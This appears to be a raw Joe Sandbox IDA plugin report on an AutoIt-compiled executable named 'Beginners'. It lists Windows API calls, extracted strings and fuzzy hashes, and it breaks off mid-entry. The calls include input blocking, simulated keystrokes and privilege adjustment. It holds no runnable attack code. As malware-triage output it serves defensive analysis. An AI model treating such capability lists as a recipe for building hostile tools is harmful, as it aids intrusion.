                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InputSendkeybd_event
                                          • String ID:
                                          • API String ID: 3536248340-0
                                          • Opcode ID: 75db548ba4944b482e9de292478a0fbc7528153ba1e3889bf3500fc243c16c0b
                                          • Instruction ID: fce50987df16e23ed9e17b925ca5d00560089f5629982e445fed62160f8c06ff
                                          • Opcode Fuzzy Hash: 75db548ba4944b482e9de292478a0fbc7528153ba1e3889bf3500fc243c16c0b
                                          • Instruction Fuzzy Hash: 84F0A93190020CABDB04CF91C805BFEBBB4FF08312F00800AFE459A2A2D3398A51DF94
                                          APIs
                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,00129B52,?,0014098C,?), ref: 0011A6DA
                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,00129B52,?,0014098C,?), ref: 0011A6EC
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorFormatLastMessage
                                          • String ID:
                                          • API String ID: 3479602957-0
                                          APIs
                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00108F27), ref: 00108DFE
                                          • CloseHandle.KERNEL32(?,?,00108F27), ref: 00108E10
                                          Similarity
                                          • API ID: AdjustCloseHandlePrivilegesToken
                                          • String ID:
                                          • API String ID: 81990902-0
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,000D8F87,?,?,?,00000001), ref: 000DA38A
                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 000DA393
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          APIs
                                          • BlockInput.USER32(00000001), ref: 001245F0
                                          Similarity
                                          • API ID: BlockInput
                                          • String ID:
                                          • API String ID: 3456056419-0
                                          APIs
                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00115205
                                          Similarity
                                          • API ID: mouse_event
                                          • String ID:
                                          • API String ID: 2434400541-0
                                          APIs
                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00108FA7), ref: 00109389
                                          Similarity
                                          • API ID: LogonUser
                                          • String ID:
                                          • API String ID: 1244722697-0
                                          APIs
                                          • GetUserNameW.ADVAPI32(?,?), ref: 000F0734
                                          Similarity
                                          • API ID: NameUser
                                          • String ID:
                                          • API String ID: 2645101109-0
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 000DA35A
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          APIs
                                          • CharUpperBuffW.USER32(?,?,00140980), ref: 00133C65
                                          • IsWindowVisible.USER32(?), ref: 00133C89
                                          Strings
                                          Similarity
                                          • API ID: BuffCharUpperVisibleWindow
                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                          • API String ID: 4105515805-45149045
                                          APIs
                                          • SetTextColor.GDI32(?,00000000), ref: 0013AC55
                                          • GetSysColorBrush.USER32(0000000F), ref: 0013AC86
                                          • GetSysColor.USER32(0000000F), ref: 0013AC92
                                          • SetBkColor.GDI32(?,000000FF), ref: 0013ACAC
                                          • SelectObject.GDI32(?,?), ref: 0013ACBB
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0013ACE6
                                          • GetSysColor.USER32(00000010), ref: 0013ACEE
                                          • CreateSolidBrush.GDI32(00000000), ref: 0013ACF5
                                          • FrameRect.USER32(?,?,00000000), ref: 0013AD04
                                          • DeleteObject.GDI32(00000000), ref: 0013AD0B
                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0013AD56
                                          • FillRect.USER32(?,?,?), ref: 0013AD88
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0013ADB3
                                            • Part of subcall function 0013AF18: GetSysColor.USER32(00000012), ref: 0013AF51
                                            • Part of subcall function 0013AF18: SetTextColor.GDI32(?,?), ref: 0013AF55
                                            • Part of subcall function 0013AF18: GetSysColorBrush.USER32(0000000F), ref: 0013AF6B
                                            • Part of subcall function 0013AF18: GetSysColor.USER32(0000000F), ref: 0013AF76
                                            • Part of subcall function 0013AF18: GetSysColor.USER32(00000011), ref: 0013AF93
                                            • Part of subcall function 0013AF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0013AFA1
                                            • Part of subcall function 0013AF18: SelectObject.GDI32(?,00000000), ref: 0013AFB2
                                            • Part of subcall function 0013AF18: SetBkColor.GDI32(?,00000000), ref: 0013AFBB
                                            • Part of subcall function 0013AF18: SelectObject.GDI32(?,?), ref: 0013AFC8
                                            • Part of subcall function 0013AF18: InflateRect.USER32(?,000000FF,000000FF), ref: 0013AFE7
                                            • Part of subcall function 0013AF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0013AFFE
                                            • Part of subcall function 0013AF18: GetWindowLongW.USER32(00000000,000000F0), ref: 0013B013
                                          Similarity
                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                          • String ID:
                                          • API String ID: 4124339563-0
                                          APIs
                                          • DestroyWindow.USER32(?,?,?), ref: 000B3072
                                          • DeleteObject.GDI32(00000000), ref: 000B30B8
                                          • DeleteObject.GDI32(00000000), ref: 000B30C3
                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 000B30CE
                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 000B30D9
                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 000EC77C
                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 000EC7B5
                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 000ECBDE
                                            • Part of subcall function 000B1F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000B2412,?,00000000,?,?,?,?,000B1AA7,00000000,?), ref: 000B1F76
                                          • SendMessageW.USER32(?,00001053), ref: 000ECC1B
                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 000ECC32
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 000ECC48
                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 000ECC53
                                          Strings
                                          Similarity
                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                          • String ID: 0
                                          • API String ID: 464785882-4108050209
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                          • API String ID: 2660009612-1645009161
                                          APIs
                                          • DestroyWindow.USER32(00000000), ref: 00127BC8
                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00127C87
                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00127CC5
                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00127CD7
                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00127D1D
                                          • GetClientRect.USER32(00000000,?), ref: 00127D29
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00127D6D
                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00127D7C
                                          • GetStockObject.GDI32(00000011), ref: 00127D8C
                                          • SelectObject.GDI32(00000000,00000000), ref: 00127D90
                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00127DA0
                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00127DA9
                                          • DeleteDC.GDI32(00000000), ref: 00127DB2
                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00127DDE
                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 00127DF5
                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00127E30
                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00127E44
                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 00127E55
                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00127E85
                                          • GetStockObject.GDI32(00000011), ref: 00127E90
                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00127E9B
                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00127EA5
                                          Strings
                                          Similarity
                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                          • API String ID: 2910397461-517079104
                                          • Opcode ID: 4996a9e484cb376ba4f579865f8fa0fa47b2cb3f047bbf6f1e76b27d99a9d3c2
                                          • Instruction ID: cd9079876b1e14fec48983f39a1a1801cfa88323f17128dec329c777e5ff5568
                                          • Opcode Fuzzy Hash: 4996a9e484cb376ba4f579865f8fa0fa47b2cb3f047bbf6f1e76b27d99a9d3c2
                                          • Instruction Fuzzy Hash: 7BA17EB1A40219BFEB14DBA5DC4AFAF7BB9EB09710F004114FA15A76E1C770AD90CB64
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0011B361
                                          • GetDriveTypeW.KERNEL32(?,00142C4C,?,\\.\,00140980), ref: 0011B43E
                                          • SetErrorMode.KERNEL32(00000000,00142C4C,?,\\.\,00140980), ref: 0011B59C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorMode$DriveType
                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                          • API String ID: 2907320926-4222207086
                                          • Opcode ID: b3fc38c467ee3b506a5adeca5ba2ca04ea7fdea639e69ac9e51d9667c100ccd1
                                          • Instruction ID: 799a1f83637652d095c7fc0c21d1a60d2dd26feb5463f1e16787a248e7a87bec
                                          • Opcode Fuzzy Hash: b3fc38c467ee3b506a5adeca5ba2ca04ea7fdea639e69ac9e51d9667c100ccd1
                                          • Instruction Fuzzy Hash: 3C519034B4C609EBCB4CDB20CDC2AFC77A2AB49740B648035E406E72E2D771AED1DA51
                                          APIs
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 0013A0F7
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0013A1B0
                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 0013A1CC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window
                                          • String ID: 0
                                          • API String ID: 2326795674-4108050209
                                          • Opcode ID: 11d1e403e4251fb6ddfde40e48b5c0291f7a0fafd03068f49a94d6331ee4e7b4
                                          • Instruction ID: 739e702ea11adacacfb94da584ef236a0955fc9b8091ee172dc3bbc0eb266023
                                          • Opcode Fuzzy Hash: 11d1e403e4251fb6ddfde40e48b5c0291f7a0fafd03068f49a94d6331ee4e7b4
                                          • Instruction Fuzzy Hash: 3E02DF70108301AFDB19CF14C849BAABBE4FF89314F48861DF9DA962A1C775D984CB93
                                          APIs
                                          • GetSysColor.USER32(00000012), ref: 0013AF51
                                          • SetTextColor.GDI32(?,?), ref: 0013AF55
                                          • GetSysColorBrush.USER32(0000000F), ref: 0013AF6B
                                          • GetSysColor.USER32(0000000F), ref: 0013AF76
                                          • CreateSolidBrush.GDI32(?), ref: 0013AF7B
                                          • GetSysColor.USER32(00000011), ref: 0013AF93
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0013AFA1
                                          • SelectObject.GDI32(?,00000000), ref: 0013AFB2
                                          • SetBkColor.GDI32(?,00000000), ref: 0013AFBB
                                          • SelectObject.GDI32(?,?), ref: 0013AFC8
                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0013AFE7
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0013AFFE
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0013B013
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0013B05F
                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0013B086
                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 0013B0A4
                                          • DrawFocusRect.USER32(?,?), ref: 0013B0AF
                                          • GetSysColor.USER32(00000011), ref: 0013B0BD
                                          • SetTextColor.GDI32(?,00000000), ref: 0013B0C5
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0013B0D9
                                          • SelectObject.GDI32(?,0013AC1F), ref: 0013B0F0
                                          • DeleteObject.GDI32(?), ref: 0013B0FB
                                          • SelectObject.GDI32(?,?), ref: 0013B101
                                          • DeleteObject.GDI32(?), ref: 0013B106
                                          • SetTextColor.GDI32(?,?), ref: 0013B10C
                                          • SetBkColor.GDI32(?,?), ref: 0013B116
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 1bb0f8f6008f1add04fe89f70927c58e0ae9636a207e9879f11e5125fe3d6c31
                                          • Instruction ID: d57763e2a016bd86e31ed7869bfd11887be3c3c8ed6a94b3b0812d894e8ed195
                                          • Opcode Fuzzy Hash: 1bb0f8f6008f1add04fe89f70927c58e0ae9636a207e9879f11e5125fe3d6c31
                                          • Instruction Fuzzy Hash: 31617C75900218BFDF169FA5DC48EAE7B79EF09320F114115FA15AB2A1D7719980CF90
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 001390EA
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 001390FB
                                          • CharNextW.USER32(0000014E), ref: 0013912A
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0013916B
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00139181
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00139192
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 001391AF
                                          • SetWindowTextW.USER32(?,0000014E), ref: 001391FB
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00139211
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00139242
                                          • _memset.LIBCMT ref: 00139267
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 001392B0
                                          • _memset.LIBCMT ref: 0013930F
                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00139339
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 00139391
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0013943E
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00139460
                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001394AA
                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 001394D7
                                          • DrawMenuBar.USER32(?), ref: 001394E6
                                          • SetWindowTextW.USER32(?,0000014E), ref: 0013950E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0
                                          • API String ID: 1073566785-4108050209
                                          • Opcode ID: 50da400107ed8809f0c00ca3b3ad15ed330f97bb5bd6d4f3203f7164c797fd18
                                          • Instruction ID: 6c0e8cd5d0dc1432cf4cad8b87408e141f3d0e5124a1216deb2dd926aac08811
                                          • Opcode Fuzzy Hash: 50da400107ed8809f0c00ca3b3ad15ed330f97bb5bd6d4f3203f7164c797fd18
                                          • Instruction Fuzzy Hash: 30E1B175900209AFDF259F55CC88EEF7BBCEF09750F108156FA19AA291D7B08A81CF61
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 00135007
                                          • GetDesktopWindow.USER32 ref: 0013501C
                                          • GetWindowRect.USER32(00000000), ref: 00135023
                                          • GetWindowLongW.USER32(?,000000F0), ref: 00135085
                                          • DestroyWindow.USER32(?), ref: 001350B1
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 001350DA
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001350F8
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0013511E
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 00135133
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00135146
                                          • IsWindowVisible.USER32(?), ref: 00135166
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00135181
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00135195
                                          • GetWindowRect.USER32(?,?), ref: 001351AD
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 001351D3
                                          • GetMonitorInfoW.USER32(00000000,?), ref: 001351ED
                                          • CopyRect.USER32(?,?), ref: 00135204
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 0013526F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: 7dfc0c93b752dc6e3f5fd5a6a4c185fe8cab575b78cf84b24d9d9a9e4aacae7d
                                          • Instruction ID: 6be34a5d75a76a16ac22a6054d083eee215a43991f32569b23a78236fdbc71f0
                                          • Opcode Fuzzy Hash: 7dfc0c93b752dc6e3f5fd5a6a4c185fe8cab575b78cf84b24d9d9a9e4aacae7d
                                          • Instruction Fuzzy Hash: EFB18C71604740AFD704DF65C848BABBBE5FF89710F008A1CF9999B2A2D771E845CB92
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0011499C
                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 001149C2
                                          • _wcscpy.LIBCMT ref: 001149F0
                                          • _wcscmp.LIBCMT ref: 001149FB
                                          • _wcscat.LIBCMT ref: 00114A11
                                          • _wcsstr.LIBCMT ref: 00114A1C
                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00114A38
                                          • _wcscat.LIBCMT ref: 00114A81
                                          • _wcscat.LIBCMT ref: 00114A88
                                          • _wcsncpy.LIBCMT ref: 00114AB3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 699586101-1459072770
                                          • Opcode ID: 8dafc35768f09ecc4ff2e6f81e1aa8405b64970db74e0ee03c67951b2bc1f576
                                          • Instruction ID: 9ade2f768b5473b81983a3535645d0199737b8dfb9cd179da169331f54459904
                                          • Opcode Fuzzy Hash: 8dafc35768f09ecc4ff2e6f81e1aa8405b64970db74e0ee03c67951b2bc1f576
                                          • Instruction Fuzzy Hash: D44105726043047BEB14B7609C43EFF7BACDF45720F00047AF905A6293EB74AA8196B6
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000B2C8C
                                          • GetSystemMetrics.USER32(00000007), ref: 000B2C94
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 000B2CBF
                                          • GetSystemMetrics.USER32(00000008), ref: 000B2CC7
                                          • GetSystemMetrics.USER32(00000004), ref: 000B2CEC
                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 000B2D09
                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 000B2D19
                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 000B2D4C
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 000B2D60
                                          • GetClientRect.USER32(00000000,000000FF), ref: 000B2D7E
                                          • GetStockObject.GDI32(00000011), ref: 000B2D9A
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 000B2DA5
                                            • Part of subcall function 000B2714: GetCursorPos.USER32(?), ref: 000B2727
                                            • Part of subcall function 000B2714: ScreenToClient.USER32(001777B0,?), ref: 000B2744
                                            • Part of subcall function 000B2714: GetAsyncKeyState.USER32(00000001), ref: 000B2769
                                            • Part of subcall function 000B2714: GetAsyncKeyState.USER32(00000002), ref: 000B2777
                                          • SetTimer.USER32(00000000,00000000,00000028,000B13C7), ref: 000B2DCC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: 461dca34a2fb4a9ab96185f87cb4e5913d65f88073a18262c16cfeba322980bf
                                          • Instruction ID: cc57e530ba32f5ac649f27d50e98dc78ca357499923255f42c18d10ed723b99f
                                          • Opcode Fuzzy Hash: 461dca34a2fb4a9ab96185f87cb4e5913d65f88073a18262c16cfeba322980bf
                                          • Instruction Fuzzy Hash: 9CB17A75A0020A9FDB15DFA9DD49FEE7BB4FB08311F104229FA15A72E0DB70A891CB51
                                          APIs
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          • GetForegroundWindow.USER32(00140980,?,?,?,?,?), ref: 000D04E3
                                          • IsWindow.USER32(?), ref: 001066BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$Foreground_memmove
                                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                          • API String ID: 3828923867-1919597938
                                          • Opcode ID: 7d69e9e6188acd13199a3938c84f070669cc152a210c01fbaec99ceecfad5f2f
                                          • Instruction ID: 683ea1b77369d2ca584e02ba373ed9582ed5c64e89c137b18f0fb426f1e9f31e
